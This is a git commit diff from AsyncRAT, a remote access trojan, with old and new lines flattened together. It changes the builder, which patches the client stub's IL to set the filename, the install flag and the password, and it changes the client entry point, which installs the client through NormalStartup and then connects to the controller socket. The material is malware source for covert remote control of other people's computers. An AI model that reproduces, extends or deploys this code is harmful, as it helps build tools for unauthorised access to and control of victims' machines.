This commit is contained in:
NYAN CAT 2019-03-28 08:21:48 -07:00
parent 64e4b5b5a9
commit 80fab95e98
3 changed files with 3 additions and 2 deletions

View File

@ -50,7 +50,7 @@ namespace AsyncRAT_Sharp.Forms
method.Body.Instructions[i].Operand = textFilename.Text; method.Body.Instructions[i].Operand = textFilename.Text;
if (method.Body.Instructions[i].Operand.ToString() == "false") if (method.Body.Instructions[i].Operand.ToString() == "false")
method.Body.Instructions[i].Operand = checkBox1.Checked.ToString(); method.Body.Instructions[i].Operand = checkBox1.Checked.ToString().ToLower();
if (method.Body.Instructions[i].Operand.ToString() == "NYAN CAT") if (method.Body.Instructions[i].Operand.ToString() == "NYAN CAT")
method.Body.Instructions[i].Operand = Settings.Password; method.Body.Instructions[i].Operand = Settings.Password;

View File

@ -1,6 +1,7 @@
using System.Threading; using System.Threading;
using Client.Sockets; using Client.Sockets;
using Client.Install; using Client.Install;
using System;
// │ Author : NYAN CAT // │ Author : NYAN CAT
// │ Name : AsyncRAT // Simple Socket // │ Name : AsyncRAT // Simple Socket
@ -18,7 +19,7 @@ namespace Client
static void Main() static void Main()
{ {
if (Settings.Install == "true") if (Convert.ToBoolean(Settings.Install))
NormalStartup.Install(); NormalStartup.Install();
ClientSocket.InitializeClient(); ClientSocket.InitializeClient();